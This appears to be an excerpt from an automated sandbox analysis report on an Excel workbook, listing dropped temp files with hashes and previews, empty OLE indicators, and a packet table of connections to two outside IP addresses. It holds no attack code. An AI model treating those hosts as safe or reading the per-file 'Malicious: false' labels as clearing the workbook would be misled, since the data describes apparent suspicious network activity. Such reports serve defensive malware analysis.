SHA-512:	64AF7C3547E3FD63570B3237CD8616B94AF77FAFD5CA47305096CB418CC079F217F81C12E7650B183D721E528EF9BFB6805F1F9CB7ECAD3B1157A21A71575600
Malicious:	false
Preview:	.]o.0...'.?D...C..c".....J.~......d.-......B#"57.b.y......V... ........B..&..~.......5P...r9..ir.r...6.&m.......Y....#s.5...7.1.`....rk".X..L'?a..U,..x{M.LC.....TM.N..>.Y1..U.sNI."N.>....... ,...S....D.*.%2.[....ohzP.....+3Xh.._.7...K...jS..........o..-.T......E..I.F....T.._i..6l...4O.{.re..2~...E..i.....9N...u .....} ....8. ...n....u.my>../..1....^......y<Bns`I..R.z.}...r.<.......y.....@7_..}..nL.".\|.{.......].......L..3]...w....o.u......<..T]:l.>J...].t......C:...;.i>.M........PK..........!.l4.>....Q.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.350647094482033
Encrypted:	false
SSDEEP:	3:oVXUHOudRPRFq98JOGXnEHOudRPRFNj+n:o9UFRPjq9qEFRPjNC
MD5:	AA5064E15E4D0AEA94E3CED2A9116D00
SHA1:	8C0C470327CE528DFBA7327EDA643CBC785BE9B7
SHA-256:	6DA7F3580E2A07C8A18A69DE0405332E8F99B51633D05AF6F56AC947F47A90F2
SHA-512:	288681DFC4A8D03440DDEFB24D674A2BB8CB0E37D800E14A366761D221A6B096518418B0CB908BDC00D1835A11D6A447886BEDEC38718CD4A0496362EBDDB307
Malicious:	false
Preview:	[2021/02/12 18:45:17.040] Latest deploy version: ..[2021/02/12 18:45:17.040] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF045C60B1D61D61DD.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40161
Entropy (8bit):	0.6711553904243401
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+uoCLY1QMZ8qIQMZ8qfQMZ8qo:kBqoxKAuqR+uoCLY1f8tf8Sf8f
MD5:	F284D54A46FE85B8D9BB488A5BB5767E
SHA1:	C47682EB55CA0DA59ED55A024B9D754D32BDE295
SHA-256:	17C4E9EFB3592C257E7902C77B7C3EC9442D39C8A54802B1EDE58826D42A3CC8
SHA-512:	C243F111D1185E2FE883E8FDFB6267A9DD7FF108EE1247D11BEC475D93F6A55F35CE3F5334D72F1A34A5CC4B7A1E91B15E6D3E2AC63493FE5D3EB51E740688B4
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF78E812B899E938EF.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40057
Entropy (8bit):	0.6537107836008167
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+oAoGocodoGorWtZtzELz6WtZtzELzNWtZtzELz+:kBqoxKAuqR+9DhAj+aZtQSaZtQ1aZtQG
MD5:	F4CD805F3A1698C27AFDFE36FF594A7A
SHA1:	25423F6F817375659755A7ADE64393F75ADC4BB0
SHA-256:	8C1C4DA6D0674B31421B14C64F7171DB798897DBA4F4E4C18C75461872EDB27F
SHA-512:	1851E13C3771EBDBCE37CC7FA231954C80352CE1E4A218D354A46E8E1B162557FF49C785ADAA652FA26A8866F626331201197DA015C4C88B8D1B23E2F1EF3108
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF8C7CED52649AE0BD.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40161
Entropy (8bit):	0.673093331820852
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+IOEV+vdHfcM1vdHfcM18dHfcM1Z:kBqoxKAuqR+IOEV+vdHkMBdHkMWdHkMz
MD5:	548991C70906D6022A7272B9B5C2E0FD
SHA1:	001ACA74A13D59F99C39AAFFE0B50B140AFA688A
SHA-256:	3B167116E8BFA1B29A71D0ED67ECC3A38D10C80E42C8CC7DF6EF1464F2CAD8E0
SHA-512:	67AE0FCDBCF175AE300F27AE4D8BA49BBEF9910360CB28E3AF6C40DF85C29697E94A270AA37C842DF19D3A77853E8B1C233547D32A604248235067AFFED41A14
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD125B1B4DDDD071C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13269
Entropy (8bit):	0.6145518065699566
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loSrF9loSR9lWSc0OolgcOZFuODOb:kBqoIS6SEScyYM
MD5:	0C2BC26B1840E27C9C8E4A9BE170E49D
SHA1:	729E35F88D85FC94277C24CE292BB29A185D29D5
SHA-256:	00937E28E5117015401C47B94884CF31899E331BD268622D4D682970CF2A393C
SHA-512:	E0DFA22EBBCF29592AC01C4C9F1171065C7E59F395DD9AE879BA1E5E6E637BCF78142E1D379A45F8CC6EEC1708A09D07E296B73EEEACBE17D84159ADE0CA4A4A
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$File_78476.xlsb Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:RFXI6dtt:RJ1
MD5:	7AB76C81182111AC93ACF915CA8331D5
SHA1:	68B94B5D4C83A6FB415C8026AF61F3F8745E2559
SHA-256:	6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
SHA-512:	A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
Malicious:	false
Preview:	.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.795746960854538
TrID:	Excel Microsoft Office Binary workbook document (47504/1) 49.74% Excel Microsoft Office Open XML Format document (40004/1) 41.89% ZIP compressed archive (8000/1) 8.38%
File name:	File_78476.xlsb
File size:	105647
MD5:	77927a0a05cc284ca6e904563cf81f20
SHA1:	0ffd8f1b079a75f143cd601d832e1a5e2f651818
SHA256:	d46861839e12139c03aceef7f735426d794809344f18d8b2053377dcb1ebd470
SHA512:	fb09044f91b0aa2129be642bcff264a7936fed96689308ab339441085c6b2c822fe4787ce0d3760bdbc262c48be665a9f0c72e2d34ea44ced7cf5a6e43723c3a
SSDEEP:	3072:VqiXh/woPcEM0Y0WAvh+qj1I4UjF57Q14o:Vqix/bkrd1kIbW
File Content Preview:	PK..........!.._\.}...........[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	74f0d0d2c6d6d0f4

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "File_78476.xlsb"

Indicators
Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 12, 2021 18:43:16.175761938 CET	49729	80	192.168.2.3	139.162.191.228
Feb 12, 2021 18:43:16.218789101 CET	80	49729	139.162.191.228	192.168.2.3
Feb 12, 2021 18:43:16.218898058 CET	49729	80	192.168.2.3	139.162.191.228
Feb 12, 2021 18:43:16.219579935 CET	49729	80	192.168.2.3	139.162.191.228
Feb 12, 2021 18:43:16.260248899 CET	80	49729	139.162.191.228	192.168.2.3
Feb 12, 2021 18:43:16.400799036 CET	80	49729	139.162.191.228	192.168.2.3
Feb 12, 2021 18:43:16.400871038 CET	49729	80	192.168.2.3	139.162.191.228
Feb 12, 2021 18:43:16.633514881 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:16.792850971 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:16.792964935 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:16.794573069 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:16.956156015 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:16.959835052 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:16.959944010 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:16.960037947 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:16.960059881 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:16.960098982 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:16.960134029 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:16.973577023 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.135355949 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.135493994 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.136398077 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.340226889 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.379473925 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.379494905 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.379514933 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.379535913 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.379555941 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.379580975 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.379595995 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.379602909 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.379625082 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.379657030 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.379702091 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.379704952 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.379724979 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.379750013 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.379775047 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.540467978 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540501118 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540513039 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540534973 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540549994 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540565014 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540585995 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540605068 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540625095 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540642023 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.540646076 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540669918 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540683985 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.540693998 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540715933 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.540715933 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540738106 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540745974 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.540798903 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.540816069 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540834904 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540863991 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.540888071 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540900946 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.540911913 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540931940 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.540935040 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540956974 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.540957928 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.540982962 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.541011095 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.701994896 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702033997 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702055931 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702090979 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702124119 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702172041 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702198029 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.702199936 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702228069 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702239990 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.702285051 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.702536106 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702564955 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702593088 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702601910 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.702620029 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702666998 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.702673912 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702717066 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.702764988 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702799082 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702825069 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.702851057 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702869892 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.702881098 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702904940 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.702908993 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702936888 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702939987 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.702965021 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.702979088 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.703016996 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.703017950 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.703046083 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.703073025 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.703094959 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.703125000 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.703125954 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.703159094 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.703192949 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.703192949 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.703223944 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.703252077 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.703290939 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.703300953 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.703320026 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.703360081 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.703407049 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.733566999 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.733596087 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.733611107 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.733630896 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.733701944 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.733743906 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.734328032 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.734350920 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.734373093 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.734391928 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.734396935 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.734445095 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.734453917 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.734505892 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.734535933 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.734587908 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.734682083 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.734735966 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.736253977 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.736352921 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.867842913 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.867891073 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.867927074 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.867963076 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.867980957 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.868046999 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.878840923 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.878880978 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.878894091 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.878907919 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.878928900 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.878943920 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.878963947 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.878983021 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879005909 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879019976 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879026890 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879049063 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879065037 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879072905 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879101038 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879122972 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879172087 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879189968 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879225016 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879247904 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879256964 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879271984 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879283905 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879309893 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879374027 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879398108 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879421949 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879426003 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879442930 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879471064 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879508018 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879569054 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879590988 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879612923 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879621029 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879633904 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879659891 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879699945 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879770994 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879793882 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879816055 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879822016 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879837990 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.879867077 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.879904985 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880013943 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880036116 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880063057 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880079031 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880104065 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880106926 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880127907 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880131960 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880151987 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880160093 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880173922 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880186081 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880196095 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880213022 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880219936 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880238056 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880238056 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880259991 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880268097 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880280972 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880302906 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880312920 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880342007 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880342960 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880383968 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880388975 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880407095 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880431890 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880459070 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880486012 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880534887 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880556107 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880580902 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880603075 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880604029 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880644083 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880693913 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880716085 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880737066 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880740881 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880758047 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.880784988 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.880824089 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.894992113 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.895025969 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.895039082 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.895051003 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.895066977 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.895082951 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.895097971 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.895117998 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.895190001 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.895251989 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.895255089 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.895278931 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.895301104 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.895313978 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:17.895322084 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:17.895344019 CET	443	49731	162.241.169.26	192.168.2.3
